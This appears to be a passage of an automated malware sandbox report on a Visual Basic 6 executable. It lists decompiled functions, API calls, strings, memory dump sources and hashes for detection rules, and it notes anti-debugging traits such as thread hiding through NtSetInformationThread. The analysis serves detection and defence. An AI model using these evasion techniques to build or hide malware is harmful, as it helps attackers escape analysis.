Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,004011E6), ref: 004127AE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411F60,00000284), ref: 0041282A
__vbaNew2.MSVBVM60(00412134,00416E2C), ref: 0041285C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412124,00000014), ref: 004128C2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412144,000000E0), ref: 00412925
__vbaStrMove.MSVBVM60 ref: 00412956
__vbaFreeObj.MSVBVM60 ref: 0041295F
__vbaNew2.MSVBVM60(0041049C,00415010), ref: 0041297F
__vbaObjSet.MSVBVM60(?,00000000), ref: 004129B9
__vbaChkstk.MSVBVM60 ref: 004129DE
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412154,000001D0), ref: 00412A46
__vbaFreeObj.MSVBVM60 ref: 00412A61
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411F90,000006F8), ref: 00412AEB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411F90,000006FC), ref: 00412B3D
__vbaNew2.MSVBVM60(0041049C,00415010), ref: 00412B6F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412BA9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412164,00000138), ref: 00412BFA
__vbaNew2.MSVBVM60(0041049C,00415010), ref: 00412C25
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412C5F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412154,00000170), ref: 00412CAD
__vbaVarDup.MSVBVM60 ref: 00412CEE
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00412DB0
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,004011E6), ref: 00412DC6
__vbaVarAdd.MSVBVM60(?,00000002,?), ref: 00412DF9
__vbaVarMove.MSVBVM60 ref: 00412E04
__vbaNew2.MSVBVM60(0041049C,00415010), ref: 00412E24
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412E5E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412154,00000060), ref: 00412EA9
__vbaNew2.MSVBVM60(0041049C,00415010), ref: 00412ED4
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412F0E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412154,00000050), ref: 00412F56
__vbaNew2.MSVBVM60(0041049C,00415010), ref: 00412F81
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412FBB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412164,00000130), ref: 00413009
__vbaNew2.MSVBVM60(0041049C,00415010), ref: 00413034
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041306E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412154,00000088), ref: 004130BF
__vbaStrMove.MSVBVM60 ref: 0041315B
__vbaChkstk.MSVBVM60(0A951920,0000493A,00000003,?,?), ref: 00413199
__vbaChkstk.MSVBVM60(004B3E59,0A951920,0000493A,00000003,?,?), ref: 004131CD
__vbaFreeStr.MSVBVM60 ref: 00413225
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 0041323D
__vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041325A
__vbaNew2.MSVBVM60(0041049C,00415010), ref: 0041327D
__vbaObjSet.MSVBVM60(?,00000000), ref: 004132B7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412154,000000F8), ref: 00413305
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00413329
__vbaI4Var.MSVBVM60(?,?), ref: 00413351
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413386
__vbaFreeVar.MSVBVM60 ref: 00413392
__vbaVarTstLt.MSVBVM60(00008003,?), ref: 004133BE
__vbaOnError.MSVBVM60(000000FF), ref: 004133D9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411F60,00000288), ref: 0041341F
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00413443
__vbaI4Var.MSVBVM60(00000000), ref: 0041344D
__vbaFreeObj.MSVBVM60 ref: 00413459
__vbaFreeVar.MSVBVM60 ref: 00413462
__vbaFreeStr.MSVBVM60 ref: 00413495
__vbaFreeStr.MSVBVM60(0041350D), ref: 004134FD
__vbaFreeVar.MSVBVM60 ref: 00413506

Strings

,nA, xrefs: 0041286E
:I, xrefs: 004130EB
Nerveroot, xrefs: 00412CCE
alkoxy, xrefs: 00412D4C
54, xrefs: 004130D7
COGNITIONS, xrefs: 004131F8
foldevg, xrefs: 00413108

Memory Dump Source

Source File: 00000000.00000002.684992602.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.684982891.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.685038036.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.685067594.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$List$Chkstk$Move$CallLate$Error
String ID: ,nA$54$:I$COGNITIONS$Nerveroot$alkoxy$foldevg
API String ID: 2141833910-582225477
Opcode ID: a58081895dc576e71a7db530c03f1b892308db4aa4b103643aaee1ef003f86a8
Instruction ID: c21f959898aa8d4040c4385d98eeaa376fde6748c9a47c718bfde85c716a4d25
Opcode Fuzzy Hash: a58081895dc576e71a7db530c03f1b892308db4aa4b103643aaee1ef003f86a8
Instruction Fuzzy Hash: BF821A74940219DFDB24DF90CD88BDEBBB4BB48300F1085EAE64AAB250D7B45AC5DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00413C30, Relevance: 105.4, APIs: 50, Strings: 10, Instructions: 434COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00413C9D
__vbaNew2.MSVBVM60(0041049C,00415010), ref: 00413CB6
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413CCF
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412154,00000050), ref: 00413CF0
#645.MSVBVM60(?,00000000), ref: 00413D0C
__vbaStrMove.MSVBVM60 ref: 00413D17
__vbaFreeObj.MSVBVM60 ref: 00413D26
__vbaFreeVar.MSVBVM60 ref: 00413D2B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411F60,00000218), ref: 00413D65
__vbaLateMemCallLd.MSVBVM60(?,?,Add,00000002), ref: 00413DB8
__vbaObjVar.MSVBVM60(00000000), ref: 00413DBE
__vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00413DC9
__vbaFreeObj.MSVBVM60 ref: 00413DD2
__vbaFreeVar.MSVBVM60 ref: 00413DD7
__vbaLateMemSt.MSVBVM60(?,Caption), ref: 00413E12
__vbaLateMemSt.MSVBVM60(?,Left), ref: 00413E43
__vbaNew2.MSVBVM60(0041049C,00415010), ref: 00413E58
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413E71
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412154,000000A0), ref: 00413EA5
__vbaLateMemSt.MSVBVM60(?,Top), ref: 00413EE0
__vbaFreeObj.MSVBVM60 ref: 00413EE5
__vbaLateMemSt.MSVBVM60(?,Visible), ref: 00413F14
__vbaLateMemCallLd.MSVBVM60(?,?,Caption,00000000), ref: 00413F33
__vbaVarTstEq.MSVBVM60(00008008,00000000), ref: 00413F3D
__vbaFreeVar.MSVBVM60 ref: 00413F49
__vbaNew2.MSVBVM60(0041049C,00415010), ref: 00413F67
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413F86
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412154,00000108), ref: 00413FA9
#580.MSVBVM60(?,00000001), ref: 00413FB5
__vbaFreeStr.MSVBVM60 ref: 00413FBE
__vbaFreeObj.MSVBVM60 ref: 00413FC7
__vbaVarDup.MSVBVM60 ref: 00413FE5
#528.MSVBVM60(?,?), ref: 00413FF3
__vbaVarTstNe.MSVBVM60(?,?), ref: 00414015
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00414028
__vbaNew2.MSVBVM60(0041049C,00415010), ref: 0041404D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414066
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412164,00000138), ref: 00414092
__vbaNew2.MSVBVM60(0041049C,00415010), ref: 004140AF
__vbaObjSet.MSVBVM60(?,00000000), ref: 004140C8
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412154,00000178), ref: 004140EB
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004140F9
__vbaFpI4.MSVBVM60 ref: 0041410D
__vbaI4Var.MSVBVM60(?,00000000), ref: 00414118
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411F60,000002C8), ref: 0041416F
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041417F
__vbaFreeVar.MSVBVM60 ref: 0041418B
__vbaFreeStr.MSVBVM60(004141E8), ref: 004141D7
__vbaFreeObj.MSVBVM60 ref: 004141DC
__vbaFreeStr.MSVBVM60 ref: 004141E5

Strings

laboratorieplanlgning, xrefs: 00413F25
Add, xrefs: 00413DAE
VB.CheckBox, xrefs: 00413D3B
Caption, xrefs: 00413E09, 00413F1B
8"A, xrefs: 00413D78, 00413EC8
Top, xrefs: 00413ED7
Left, xrefs: 00413E3A
JENHJDERNE, xrefs: 00413D45
Visible, xrefs: 00413F0B
Bigwiggedness1, xrefs: 00413DFB

Memory Dump Source

Source File: 00000000.00000002.684992602.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.684982891.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.685038036.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.685067594.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultLate$New2$Call$List$#528#580#645AddrefCopyMove
String ID: 8"A$Add$Bigwiggedness1$Caption$JENHJDERNE$Left$Top$VB.CheckBox$Visible$laboratorieplanlgning
API String ID: 2919225322-941196835
Opcode ID: 978998ff41c6f789a99b41e4bba4fe4cb861b1c074d690afa4db5766760e48c4
Instruction ID: 2e61a8997d9a30812d4873b658aa529c9dc982937b7a79940b7af1122f3d8969
Opcode Fuzzy Hash: 978998ff41c6f789a99b41e4bba4fe4cb861b1c074d690afa4db5766760e48c4
Instruction Fuzzy Hash: 10024CB1E002099FCB14DFA8DD88ADEBBB8FF48700F10856AE549E7250D774A985CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004139F0, Relevance: 43.9, APIs: 23, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

#541.MSVBVM60(?,2:2:2), ref: 00413A54
__vbaStrVarMove.MSVBVM60(?), ref: 00413A5E
__vbaStrMove.MSVBVM60 ref: 00413A69
__vbaFreeVar.MSVBVM60 ref: 00413A78
__vbaI4Str.MSVBVM60(00412214), ref: 00413A7F
#698.MSVBVM60(?,00000000), ref: 00413A8A
__vbaVarTstNe.MSVBVM60(?,?), ref: 00413AA6
__vbaFreeVar.MSVBVM60 ref: 00413AB2
__vbaNew2.MSVBVM60(00412134,00416E2C), ref: 00413ACB
__vbaHresultCheckObj.MSVBVM60(00000000,0219ECFC,00412124,00000048), ref: 00413AF2
__vbaStrMove.MSVBVM60 ref: 00413B01
__vbaVarDup.MSVBVM60 ref: 00413B1C
#545.MSVBVM60(?,?), ref: 00413B2A
__vbaVarTstNe.MSVBVM60(?,?), ref: 00413B48
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00413B5B
__vbaNew2.MSVBVM60(00412134,00416E2C), ref: 00413B7B
__vbaObjVar.MSVBVM60(?), ref: 00413B8D
__vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00413B98
__vbaHresultCheckObj.MSVBVM60(00000000,0219ECFC,00412124,00000010), ref: 00413BB2
__vbaFreeObj.MSVBVM60 ref: 00413BBB
__vbaFreeVar.MSVBVM60(00413C0C), ref: 00413BF5
__vbaFreeStr.MSVBVM60 ref: 00413C04
__vbaFreeStr.MSVBVM60 ref: 00413C09

Strings

8/8/8, xrefs: 00413B12
2:2:2, xrefs: 00413A2A

Memory Dump Source

Source File: 00000000.00000002.684992602.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.684982891.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.685038036.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.685067594.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresultNew2$#541#545#698AddrefList
String ID: 2:2:2$8/8/8
API String ID: 889502001-2856156558
Opcode ID: f6cdc2e59b6d0f1e1889590c6d8ac398d2127dd25d8b8741912c330773002eef
Instruction ID: 9492fd0fcf68211126652c44b7da3e0b57f39f1add52677cc22b1cf71a66a427
Opcode Fuzzy Hash: f6cdc2e59b6d0f1e1889590c6d8ac398d2127dd25d8b8741912c330773002eef
Instruction Fuzzy Hash: 6F511C75C00259AFCB14DFE4DA489DDBBB8FB48B01F20812AF542B7164DBB46A85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00401378, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 278COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040137D

Strings

VB5!6&*, xrefs: 00401378

Memory Dump Source

Source File: 00000000.00000002.684992602.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.684982891.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.685038036.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.685067594.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: ef8e5b9852998cb4efb1f5d3607e601480f727485b6aa2bde1fcb7e159aba9cb
Instruction ID: 524585de5d20b8578f7b3d63a9c7ef7d03dfdc44fdf1b42285d4401ebe4e1af0
Opcode Fuzzy Hash: ef8e5b9852998cb4efb1f5d3607e601480f727485b6aa2bde1fcb7e159aba9cb
Instruction Fuzzy Hash: 4651B6A284F7D10ED7038B7419221857FB1AE13224B9E49EBC4E1CF5F3D229191ED366

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402BF9, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.684992602.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.684982891.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.685038036.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.685067594.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a0bae6a650df0809377aa42bf4a4164a2ec20cc5a270638ba4b7abbe107b5bd
Instruction ID: dc9794bf4d8ae7ca56dd60224b8318b24d765379c38435a12236a0c7de914956
Opcode Fuzzy Hash: 5a0bae6a650df0809377aa42bf4a4164a2ec20cc5a270638ba4b7abbe107b5bd
Instruction Fuzzy Hash: D30142315181F18FCF52CB78C8D4A027BB1AF1F30030658D5C840AF059C360B410EB53

Uniqueness

Uniqueness Score: -1.00%

Function 00413530, Relevance: 36.8, APIs: 19, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041357C
__vbaVarDup.MSVBVM60 ref: 0041358E
__vbaVarDup.MSVBVM60 ref: 00413596
#671.MSVBVM60(00000000,00000000,00000000,40000000,00000000,40000000), ref: 004135A6
__vbaFpR8.MSVBVM60 ref: 004135AC
__vbaVarDup.MSVBVM60 ref: 004135D3
#667.MSVBVM60(?), ref: 004135D9
__vbaStrMove.MSVBVM60 ref: 004135E4
__vbaFreeVar.MSVBVM60 ref: 004135ED
#541.MSVBVM60(?,2:2:2), ref: 004135FC
__vbaStrVarMove.MSVBVM60(?), ref: 00413606
__vbaStrMove.MSVBVM60 ref: 00413611
__vbaFreeVar.MSVBVM60 ref: 0041361A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411F60,00000254), ref: 0041363F
__vbaFreeStr.MSVBVM60(0041367D), ref: 00413660
__vbaFreeStr.MSVBVM60 ref: 00413665
__vbaFreeVar.MSVBVM60 ref: 00413670
__vbaFreeStr.MSVBVM60 ref: 00413675
__vbaFreeVar.MSVBVM60 ref: 0041367A

Strings

Velbaaren, xrefs: 004135C5
2:2:2, xrefs: 004135F3

Memory Dump Source

Source File: 00000000.00000002.684992602.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.684982891.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.685038036.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.685067594.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#541#667#671CheckCopyHresult
String ID: 2:2:2$Velbaaren
API String ID: 504220352-936174853
Opcode ID: edfdb10b9e90451ebbeb6807bbdf5647960fb25fdd4d00987c0e4c02f0e428e1
Instruction ID: 4d8a6111ede1a0054f62e769ea52615bcec8088890ce57f87ae893136105308e
Opcode Fuzzy Hash: edfdb10b9e90451ebbeb6807bbdf5647960fb25fdd4d00987c0e4c02f0e428e1
Instruction Fuzzy Hash: AF411D71C00249EBCB14DF95DE49ADEBBB8FF94705F10802AE542B7264DB742A89CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004137F0, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

__vbaHresultCheckObj.MSVBVM60(00000000,004011A8,00411F60,00000190), ref: 0041386D
__vbaLateIdCallLd.MSVBVM60(?,?,00000005,00000000), ref: 00413882
__vbaI4Var.MSVBVM60(00000000), ref: 0041388C
__vbaFreeObj.MSVBVM60 ref: 00413895
__vbaFreeVar.MSVBVM60 ref: 0041389E
__vbaVarDup.MSVBVM60 ref: 004138C3
#629.MSVBVM60(?,?,00000001,?), ref: 004138D7
__vbaVarTstNe.MSVBVM60(?,?), ref: 004138FC
__vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 00413913
#570.MSVBVM60(000000C8), ref: 00413926
__vbaNew2.MSVBVM60(00412134,00416E2C), ref: 0041393E
__vbaHresultCheckObj.MSVBVM60(00000000,0219ECFC,00412124,00000014), ref: 00413963
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412144,000000B8), ref: 0041398C
__vbaFreeObj.MSVBVM60 ref: 00413991

Strings

FGFG, xrefs: 004138B5

Memory Dump Source

Source File: 00000000.00000002.684992602.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.684982891.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.685038036.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.685067594.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#570#629CallLateListNew2
String ID: FGFG
API String ID: 3758171355-2759163656
Opcode ID: dd375d79f26586c54f47e48bd59c2228c233bdb77e55f4187efc6b99c8e3ad72
Instruction ID: be216f51e73e5fa7ea078236aedc5083747e0c2f70980347b05e852a97096d58
Opcode Fuzzy Hash: dd375d79f26586c54f47e48bd59c2228c233bdb77e55f4187efc6b99c8e3ad72
Instruction Fuzzy Hash: C9513AB1901208AFDB10DFA5CA48EDEBBB9EF58705F20805AF145B7260D7B45A45CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004136A0, Relevance: 12.1, APIs: 8, Instructions: 94COMMON

Download Yara Rule

APIs

__vbaHresultCheckObj.MSVBVM60(00000000,?,00411F60,00000048), ref: 004136F9
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011E6), ref: 0041370C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411F60,0000015C), ref: 0041372F
__vbaNew2.MSVBVM60(0041049C,00415010), ref: 00413744
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041375D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412154,000001C8), ref: 004137A0
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011E6), ref: 004137A5
__vbaFreeStr.MSVBVM60(004137CF), ref: 004137C8

Memory Dump Source

Source File: 00000000.00000002.684992602.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.684982891.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.685038036.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.685067594.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$MoveNew2
String ID:
API String ID: 3514808224-0
Opcode ID: b8c74076927e39a0738f2d1198eba3c080d670749551f7dafd48db9b91528243
Instruction ID: b42861ff412cea474d359f1e5301f962d23e8fc1792c5e03b4790947dce31024
Opcode Fuzzy Hash: b8c74076927e39a0738f2d1198eba3c080d670749551f7dafd48db9b91528243
Instruction Fuzzy Hash: D23183B0A00205EFCB00DF94CDC9EDEBBB8FF08701F10842AE645AB294D778A945CB94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 4AtUJN8Hdu.exe PID: 6564 Parent PID: 6356 4AtUJN8Hdu.exeCOMMON

Executed Functions

Function 00564B29, Relevance: 10.5, APIs: 1, Strings: 4, Instructions: 1744COMMON

Download Yara Rule

Strings

1.!T, xrefs: 0056077A
+f9, xrefs: 005657DD
+<4, xrefs: 00564C39
`, xrefs: 00565918

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID: +<4$+f9$1.!T$`
API String ID: 0-1468551758
Opcode ID: 078c36d04ab0ed5df43c52d7452d7486e13ae073d282a2b7948e66d97f90ddf9
Instruction ID: 2ac0136f6d2d37d960d7718ba128c7ed0744a92f669a53d37fdc78a8fce78a37
Opcode Fuzzy Hash: 078c36d04ab0ed5df43c52d7452d7486e13ae073d282a2b7948e66d97f90ddf9
Instruction Fuzzy Hash: E8A20735C84E45C6AB4AFE3B4D2B5547EA17EC5B05F2D97B2CC3B9B224B8640829C5C3

Uniqueness

Uniqueness Score: -1.00%

Function 00560534, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(0056067A,?,00000000,?,?,?,?,?,005601D3), ref: 005605A5
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00400000,?,00000000), ref: 005607F3

Strings

1.!T, xrefs: 0056077A

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID: 1.!T
API String ID: 1954852945-3147410236
Opcode ID: f2f20f25b350dbede087ed470a9a11ca4747a86bb75a4a0228b2cf37443bd489
Instruction ID: c5df2d593e5d2af63363292cd615df57e4c87fc722e2759d907769c3b767b183
Opcode Fuzzy Hash: f2f20f25b350dbede087ed470a9a11ca4747a86bb75a4a0228b2cf37443bd489
Instruction Fuzzy Hash: C33167B0244306AFEF20AA148C66BFB3E91FBD5314F305A16FD435B2C1C670D982DA26

Uniqueness

Uniqueness Score: -1.00%

Function 0056631A, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 582COMMON

Download Yara Rule

Strings

1.!T, xrefs: 0056077A

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: 1.!T
API String ID: 3389902171-3147410236
Opcode ID: 960d70fe2b54293de76576dcb44127a21d18667117cc001c9c29de4cb219c260
Instruction ID: 135709140f1bed3bdc3bae97e2a5be048690158c0c86594e9338f242ef066bb5
Opcode Fuzzy Hash: 960d70fe2b54293de76576dcb44127a21d18667117cc001c9c29de4cb219c260
Instruction Fuzzy Hash: FE224670600342EFEF209F24CC89BA97FA1FF55314F248629E9869B2D2C7759881CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00560DBD, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 283COMMON

Download Yara Rule

Strings

W.E, xrefs: 00563FE2

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: W.E
API String ID: 1029625771-3845452836
Opcode ID: 7120733aa2c9c13ef43cce064ad0ade1e00ffdb046fbe95972b601642c506fb6
Instruction ID: 2f22d036955acc2f3c62625483fcb7dd93b1ee3536193175153e298f34d88f2c
Opcode Fuzzy Hash: 7120733aa2c9c13ef43cce064ad0ade1e00ffdb046fbe95972b601642c506fb6
Instruction Fuzzy Hash: 76818E31C04A809BEB26FE364C1F7653E60BFC1704F294666EC669B1D2F6644C55C687

Uniqueness

Uniqueness Score: -1.00%

Function 005605DE, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00400000,?,00000000), ref: 005607F3

Strings

1.!T, xrefs: 0056077A

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 847c7c13a6133edfd4734d0dc0a6962faaa77b7c7b512b0aa4405bdb07927444
Instruction ID: 091485bc2ca07eb96eeae464c525da3bb7dd7ae6891f836c38df7d7cc6fcfa0a
Opcode Fuzzy Hash: 847c7c13a6133edfd4734d0dc0a6962faaa77b7c7b512b0aa4405bdb07927444
Instruction Fuzzy Hash: 9F610434C44A0496EB49FE3B8C2B7563E91BBC4B04F18A776DD3B5B2D5B560082AC9C7

Uniqueness

Uniqueness Score: -1.00%

Function 00560EDD, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

W.E, xrefs: 00563FE2

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID: W.E
API String ID: 0-3845452836
Opcode ID: 5c96549c7e406bc6d7b0685639e5397f25cf37ffe136febad45999f9d41931e5
Instruction ID: 7e04a4e41c062896956c73d3316905867b13aa0ddafcc562bd4e3a9cba303f9a
Opcode Fuzzy Hash: 5c96549c7e406bc6d7b0685639e5397f25cf37ffe136febad45999f9d41931e5
Instruction Fuzzy Hash: F6519D31C0468197EB26FF364C1F7B57E60BFC1714F2D4275EC6597192E6A44848C68B

Uniqueness

Uniqueness Score: -1.00%

Function 0056061B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 144nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00400000,?,00000000), ref: 005607F3

Strings

1.!T, xrefs: 0056077A

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 4ff83dc49403bf6c334ef3b45e308f8ac6ff74518b9da544761de5c02f09054c
Instruction ID: d93caeb5e1cfa59e669f77f6c5e3fe1c1f1b3ad85b94851f757f66102a75639e
Opcode Fuzzy Hash: 4ff83dc49403bf6c334ef3b45e308f8ac6ff74518b9da544761de5c02f09054c
Instruction Fuzzy Hash: 90415B30C44B05D6EB08FE3A8C2BB6A3E91BBC4B04F14A632ED675B2C5F5604855C9C7

Uniqueness

Uniqueness Score: -1.00%

Function 005659CD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

1.!T, xrefs: 0056077A

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID: 1.!T
API String ID: 0-3147410236
Opcode ID: 3e343450876f37be9ebbf91bb7db67a2cb317e8cf26aa5b27040fae9648e8bc4
Instruction ID: 720d4344bb6153cec63d9892972b8b8b0fda870d2d2c01b14f2ee362dc6cfe82
Opcode Fuzzy Hash: 3e343450876f37be9ebbf91bb7db67a2cb317e8cf26aa5b27040fae9648e8bc4
Instruction Fuzzy Hash: E5313670D80B06DAEF20BE658C577EA3D91BBD4714F245622ED275B2C4F6708881C5D6

Uniqueness

Uniqueness Score: -1.00%

Function 0056069F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00400000,?,00000000), ref: 005607F3

Strings

1.!T, xrefs: 0056077A

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 37a804008adbc4ba28905af90100b1a36d175935be11d88758167abe6d8a15c1
Instruction ID: 5ccd863c09bfd92c2384e7d234e1eac4652a797258c63a0d9fb5332ca1d74269
Opcode Fuzzy Hash: 37a804008adbc4ba28905af90100b1a36d175935be11d88758167abe6d8a15c1
